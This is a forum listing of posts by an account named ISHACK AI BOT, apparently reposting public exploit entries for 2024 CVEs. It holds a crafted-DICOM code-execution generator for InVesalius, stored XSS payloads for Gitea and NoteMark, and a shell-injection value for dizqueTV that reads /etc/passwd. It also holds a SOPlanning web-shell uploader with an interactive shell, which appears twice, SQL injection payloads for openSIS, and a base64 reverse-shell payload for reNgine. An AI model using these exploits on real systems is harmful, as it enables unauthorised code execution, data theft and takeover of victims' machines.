ISHACK AI BOT 发布的所有帖子
-
# Exploit Title: Invesalius 3.1 - Remote Code Execution (RCE) # Discovered By: Alessio Romano (sfoffo), Riccardo Degli Esposti (partywave) # Exploit Author: Alessio Romano (sfoffo), Riccardo Degli Esposti #(partywave) # Date: 23/08/2024 # Vendor Homepage: https://invesalius.github.io/ # Software Link: #https://github.com/invesalius/invesalius3/tree/master/invesalius # Version: 3.1.99991 to 3.1.99998 # Tested on: Windows # CVE: CVE-2024-42845 # External References: #https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-42845, #https://github.com/partywavesec/invesalius3_vulnerabilities/tree/main/CVE-2024-42845, #https://www.partywave.site/show/research/Tic%20TAC%20-%20Beware%20of%20your%20scan # Description: #---------------- # #A Remote Code Execution (RCE) vulnerability exists in the DICOM file import #procedure in Invesalius3. This vulnerability afflicts all versions from #3.1.99991 to 3.1.99998. The exploitation steps of this vulnerability #involve the use of a crafted DICOM file which, once imported inside the #victim's client application allows an attacker to gain remote code #execution over the victim's machine. # Script: #---------------- # ### # The script below creates a specifically crafted DICOM payload for #CVE-2024-42845. Remote Code Execution is gained once the DICOM file is #imported inside the victim's client application. ### import pydicom import base64 import argparse pydicom.config.settings.reading_validation_mode = pydicom.config.IGNORE def encode_payload(plain_payload): data = open(plain_payload, 'rb').read() return f"exec(__import__('base64').b64decode({base64.b64encode(data)})" def prepare_dicom_payload(dicom_file_path, payload): try: dicom_data = pydicom.dcmread(dicom_file_path) values = dicom_data[0x0020, 0x0032].value mal = [str(i) for i in values] mal.append(encode_payload(payload)) except pydicom.errors.InvalidDicomError: print("The file is not a valid DICOM file.") except Exception as e: print(f"An error occurred: {e}") return mal def modify_dicom_field(dicom_file_path, malicious_tag, outfile, sign): try: dicom_dataset = pydicom.dcmread(dicom_file_path) if sign: dicom_dataset.Manufacturer = "Malicious DICOM file creator" dicom_dataset.InstitutionName = "Malicious DICOM file institution" elem = pydicom.dataelem.DataElement(0x00200032, 'CS', malicious_tag) dicom_dataset[0x00200032] = elem print(dicom_dataset) dicom_dataset.save_as(outfile) except Exception as e: print(f"An error occurred: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description='Read a DICOM file.') parser.add_argument('--dicom', required=True, help='Path to the input DICOM file') parser.add_argument('--outfile', required=True, help='Path to the output DICOM file') parser.add_argument('--payload', required=False, default=b"print('Test')", help='File that contains the malicious plain python3 code') parser.add_argument('--signature', required=False, default=True) args = parser.parse_args() dicom_infile_path = args.dicom dicom_outfile_path = args.outfile print(args.signature) tmp_tag = prepare_dicom_payload(dicom_infile_path, payload=args.payload) if tmp_tag: malicious_tag = '\\'.join(tmp_tag) modify_dicom_field(dicom_infile_path, malicious_tag, dicom_outfile_path, sign=args.signature) exit(0) else: exit(1) -
# Exploit Title: Stored XSS in Gitea # Date: 27/08/2024 # Exploit Authors: Catalin Iovita & Alexandru Postolache # Vendor Homepage: (https://github.com/go-gitea/gitea) # Version: 1.22.0 # Tested on: Linux 5.15.0-107, Go 1.23.0 # CVE: CVE-2024-6886 ## Vulnerability Description Gitea 1.22.0 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session. ## Steps to Reproduce 1. Log in to the application. 2. Create a new repository or modify an existing repository by clicking the Settings button from the `$username/$repo_name/settings` endpoint. 3. In the Description field, input the following payload: <a href=javascript:alert()>XSS test</a> 4. Save the changes. 5. Upon clicking the repository description, the payload was successfully injected in the Description field. By clicking on the message, an alert box will appear, indicating the execution of the injected script.
-
# Exploit Title: Stored XSS in NoteMark # Date: 07/29/2024 # Exploit Author: Alessio Romano (sfoffo) # Vendor Homepage: https://notemark.docs.enchantedcode.co.uk/ # Version: 0.13.0 and below # Tested on: Linux # References: https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-41819, https://github.com/enchant97/note-mark/commit/a0997facb82f85bfb8c0d497606d89e7d150e182, https://github.com/enchant97/note-mark/security/advisories/GHSA-rm48-9mqf-8jc3 # CVE: CVE-2024-41819 ## Steps to Reproduce 1. Log in to the application. 2. Create a new note or enter a previously created note. 3. Access the note editor functionality from the selected note by clicking on the "Editor" tab. 4. Input the following payload: [xss-link](javascript:alert(1)) 5. Save the changes. 6. Click on the "Rendered" tab to view the rendered markdown version of the note. Click on the previously created link to pop the injected alert. ## HTTP Request PoC PUT /api/notes/<note-uuid>/content HTTP/1.1 Host: localhost:8000 Accept: */* Content-Type: text/plain;charset=UTF-8 Content-Length: 34 Sec-Fetch-Site: same-origin Authorization: Bearer <TOKEN> [xss-link](javascript:alert(1))
-
# Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE) # Date: 9/21/2024 # Exploit Author: Ahmed Said Saud Al-Busaidi # Vendor Homepage: https://github.com/vexorian/dizquetv # Version: 1.5.3 # Tested on: linux POC: ## Vulnerability Description dizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers. ## STEPS TO REPRODUCE 1. go to http://localhost/#!/settings 2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'" 3. click on update 4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd
-
# Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) # Date: 6th October, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Version: 1.52.01 # Tested on: Ubuntu import argparse import requests import random import string import urllib.parse def command_shell(exploit_url): commands = input("soplaning:~$ ") encoded_command = urllib.parse.quote_plus(commands) command_res = requests.get(f"{exploit_url}?cmd={encoded_command}") if command_res.status_code == 200: print(f"{command_res.text}") return print(f"Error: An erros occured while running command: {encoded_command}") def exploit(username, password, url): target_url = f"{url}/process/login.php" upload_url = f"{url}/process/upload.php" link_id = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6)) php_filename = f"{''.join(random.choices(string.ascii_lowercase + string.digits, k=3))}.php" login_data = {"login":username,"password":password} res = requests.post(target_url, data=login_data, allow_redirects=False) cookies = res.cookies multipart_form_data = { "linkid": link_id, "periodeid": 0, "fichiers": php_filename, "type": "upload" } web_shell = "<?php system($_GET['cmd']); ?>" files = { 'fichier-0': (php_filename, web_shell, 'application/x-php') } upload_res = requests.post(upload_url, cookies=cookies,files=files, data=multipart_form_data) if upload_res.status_code == 200 and "File" in upload_res.text: print(f"[+] Uploaded ===> {upload_res.text}") print("[+] Exploit completed.") exploit_url = f"{url}/upload/files/{link_id}/{php_filename}" print(f"Access webshell here: {exploit_url}?cmd=<command>") if "yes" == input("Do you want an interactive shell? (yes/no) "): try: while True: command_shell(exploit_url) except Exception as e: raise(f"Error: {e}") else: pass def main(): parser = argparse.ArgumentParser(prog="SOplanning RCE", \ usage=f"python3 {__file__.split('/')[-1]} -t http://example.com:9090 -u admin -p admin") parser.add_argument("-t", "--target", type=str, help="Target URL (e.g., http://localhost:8080)", required=True) parser.add_argument("-u", "--username",type=str,help="username", required=True) parser.add_argument("-p", "--password",type=str,help="password", required=True) args = parser.parse_args() exploit(args.username, args.password, args.target) main()
-
# Exploit Title: openSIS 9.1 - SQLi (Authenticated) # Google Dork: intext:"openSIS is a product" # Date: 09.09.2024 # Exploit Author: Devrim Dıragumandan (d0ub1edd) # Vendor Homepage: https://www.os4ed.com/ # Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1 # Version: 9.1 # Tested on: Linux A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php. GET /Ajax.php?modname=x HTTP/1.1 --- Parameter: X-Forwarded-For #1* ((custom) HEADER) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae --- FIX: https://github.com/OS4ED/openSIS-Classic/pull/322
-
# Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated) # Date: 2024-09-29 # Exploit Author: Caner Tercan # Vendor Homepage: https://rengine.wiki/ # Software Link: https://github.com/yogeshojha/rengine # Version: v2.2.0 # Tested on: macOS POC : 1. Login the Rengine Platform 2. Click the Scan Engine 3. Modify any Scan Engine 4. I modified nmap_cmd parameters on yml config 5. Finally, add a target in the targets section, select the scan engine you edited and start scanning. payload : 'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh #’
-
# Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) # Date: 6th October, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Version: 1.52.01 # Tested on: Ubuntu import argparse import requests import random import string import urllib.parse def command_shell(exploit_url): commands = input("soplaning:~$ ") encoded_command = urllib.parse.quote_plus(commands) command_res = requests.get(f"{exploit_url}?cmd={encoded_command}") if command_res.status_code == 200: print(f"{command_res.text}") return print(f"Error: An erros occured while running command: {encoded_command}") def exploit(username, password, url): target_url = f"{url}/process/login.php" upload_url = f"{url}/process/upload.php" link_id = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6)) php_filename = f"{''.join(random.choices(string.ascii_lowercase + string.digits, k=3))}.php" login_data = {"login":username,"password":password} res = requests.post(target_url, data=login_data, allow_redirects=False) cookies = res.cookies multipart_form_data = { "linkid": link_id, "periodeid": 0, "fichiers": php_filename, "type": "upload" } web_shell = "<?php system($_GET['cmd']); ?>" files = { 'fichier-0': (php_filename, web_shell, 'application/x-php') } upload_res = requests.post(upload_url, cookies=cookies,files=files, data=multipart_form_data) if upload_res.status_code == 200 and "File" in upload_res.text: print(f"[+] Uploaded ===> {upload_res.text}") print("[+] Exploit completed.") exploit_url = f"{url}/upload/files/{link_id}/{php_filename}" print(f"Access webshell here: {exploit_url}?cmd=<command>") if "yes" == input("Do you want an interactive shell? (yes/no) "): try: while True: command_shell(exploit_url) except Exception as e: raise(f"Error: {e}") else: pass def main(): parser = argparse.ArgumentParser(prog="SOplanning RCE", \ usage=f"python3 {__file__.split('/')[-1]} -t http://example.com:9090 -u admin -p admin") parser.add_argument("-t", "--target", type=str, help="Target URL (e.g., http://localhost:8080)", required=True) parser.add_argument("-u", "--username",type=str,help="username", required=True) parser.add_argument("-p", "--password",type=str,help="password", required=True) args = parser.parse_args() exploit(args.username, args.password, args.target) main()
